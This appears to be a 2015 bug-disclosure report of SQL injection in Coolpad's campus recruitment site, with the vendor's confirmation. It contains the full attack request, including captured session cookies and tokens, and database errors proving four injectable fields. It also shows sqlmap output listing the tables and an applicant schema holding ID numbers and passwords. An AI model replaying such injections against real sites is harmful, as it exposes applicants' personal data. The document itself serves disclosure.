2015-07-14: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
手机行业安全之宇龙通信(酷派)SQL注射》》》可否给个高rank??
http://campus.coolpad.com/
0x00
抓包
POST /index.php?c=submitResumes&f=addResumeStep01Create HTTP/1.1Host: campus.coolpad.comProxy-Connection: keep-aliveContent-Length: 335Accept: application/json, text/javascript, */*; q=0.01Origin: http://campus.coolpad.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=addResumeStep01&pcode=dA==&forceEdit=yesAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987<ime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987<ime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%225f88781d8c45102cc44bcad7728b64f9%22%7D%7Dprotocol=on&temp%5Bfield_id%5D=dA%3D%3D&temp%5Bfield_position_name%5D=%E9%85%B7%E6%B4%BE%E7%B2%BE%E8%8B%B1%E4%BF%B1%E4%B9%90%E9%83%A8%E9%AA%A8%E5%B9%B2%E6%88%90%E5%91%98&temp%5Bfield_city%5D=%E5%85%A8%E5%9B%BD&temp%5Bfield_allocatable%5D=0&temp%5Bfield_expect_city1%5D=%E5%8C%97%E4%BA%AC&temp%5Bfield_expect_city2%5D=%E5%8C%97%E4%BA%AC
参数temp%5Bfield_position_name%5D可注射
response
HTTP/1.1 200 OKDate: Mon, 13 Jul 2015 09:03:30 GMTServer: nginx/1.6.0Content-Type: text/html;charset=utf-8X-Powered-By: PHP/5.5.10X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 786<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå'' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:03:29' , `sa_save_date`='2015-07-13 17:03:29' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2' at line 1<br /><strong>Error Time:</strong>2015-07-13 17:03:29
参数temp%5Bfield_city%5D可注射
HTTP/1.1 200 OKDate: Mon, 13 Jul 2015 09:04:21 GMTServer: nginx/1.6.0Content-Type: text/html;charset=utf-8X-Powered-By: PHP/5.5.10X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 786<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½'' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:04:20' , `sa_save_date`='2015-07-13 17:04:20' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京' , `sa_edit_date`=' at line 1<br /><strong>Error Time:</strong>2015-07-13 17:04:20
参数temp%5Bfield_expect_city1%5D=可注射
HTTP/1.1 200 OKDate: Mon, 13 Jul 2015 09:06:18 GMTServer: nginx/1.6.0Content-Type: text/html;charset=utf-8X-Powered-By: PHP/5.5.10X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 786<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京'' , `sa_expect_city2`='å京' , `sa_edit_date`='2015-07-13 17:06:17' , `sa_save_date`='2015-07-13 17:06:17' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'å京' , `sa_edit_date`='2015-07-13 17:06:17' , `sa_save_date`='2015-07-13 17:0' at line 1<br /><strong>Error Time:</strong>2015-07-13 17:06:17
参数temp%5Bfield_expect_city2%5D=可注射
HTTP/1.1 200 OKDate: Mon, 13 Jul 2015 09:06:51 GMTServer: nginx/1.6.0Content-Type: text/html;charset=utf-8X-Powered-By: PHP/5.5.10X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)Connection: keep-aliveContent-Length: 786<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers_audition` SET `p_id`='1' , `sa_position_name`='é ·æ´¾ç²¾è±ä¿±ä¹é¨éª¨å¹²æå' , `sa_city`='å ¨å½' , `sa_allocatable`='yes' , `sa_expect_city1`='å京' , `sa_expect_city2`='å京'' , `sa_edit_date`='2015-07-13 17:06:50' , `sa_save_date`='2015-07-13 17:06:50' , `s_id`='32564674' WHERE `s_id`=32564674 AND `p_id`=1 ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-07-13 17:06:50' , `sa_save_date`='2015-07-13 17:06:50' , `s_id`='32564674' ' at line 1<br /><strong>Error Time:</strong>2015-07-13 17:06:50
把包丢到sqlmpa试一下,*标记!
Database: coolpadjobdb[35 tables]+---------------------------------+| clp_college || clp_college_department || clp_count_position || clp_department || clp_department_managers || clp_hiring || clp_hiring_employ || clp_hiring_first || clp_hiring_second || clp_lecture || clp_managers || clp_managers_area || clp_position || clp_position_city || clp_position_interviewarea || clp_position_type || clp_position_workarea || clp_preach_plan || clp_province || clp_ranks || clp_recruit_area || clp_recruitment_dynamics || clp_seekers || clp_seekers_active || clp_seekers_audition || clp_seekers_behave || clp_seekers_connection || clp_seekers_education || clp_seekers_family_relationship || clp_seekers_practice_experience || clp_seekers_project_experience || clp_seekers_self_evaluation || clp_seekers_skills_hobbies || statistics_datas || statistics_status |+---------------------------------+
Database: coolpadjobdbTable: clp_seekers[38 columns]+----------------------------+------------------------------------------------------------------------+| Column | Type |+----------------------------+------------------------------------------------------------------------+| coolyun_uid | int(9) || s_address | varchar(420) || s_before_colloge_residence | varchar(45) || s_birthday | timestamp || s_card_type | enum('idcard','other') || s_edit_date | datetime || s_email | varchar(24) || s_emergency_contact | varchar(72) || s_emergency_contact_tel | varchar(18) || s_emergency_number | varchar(42) || s_eng_rank_goal | varchar(12) || s_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') || s_expect_graduation | timestamp || s_graduation_time | datetime || s_health | enum('better','nice','bad') || s_height | int(4) || s_iconb | varchar(420) || s_icons | varchar(420) || s_id | int(8) || s_idcard | varchar(20) || s_living_city | varchar(45) || s_marital_status | enum('married','unmarried','divorce','secret') || s_name | varchar(72) || s_nation | varchar(32) || s_origin_palce | varchar(128) || s_other_eng_rank_goal | varchar(12) || s_other_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') || s_other_lang_rank | varchar(300) || s_password | varchar(32) || s_photo | varchar(300) || s_political_status | enum('members','party','other') || s_portrait | varchar(360) || s_realname | varchar(24) || s_save_date | datetime || s_sex | enum('lady','gentleman') || s_tel | varchar(18) || s_wechat | varchar(24) || s_weight | int(4) |+----------------------------+------------------------------------------------------------------------+
available databases [3]:[*] coolpadjobdb[*] information_schema[*] test
换是那个数据库,我只是想要个高rank
我只是想要个高rank
危害等级:高
漏洞Rank:10
确认时间:2015-07-14 14:20
同一性质的问题重复提交。十分感谢您关注酷派安全
暂无
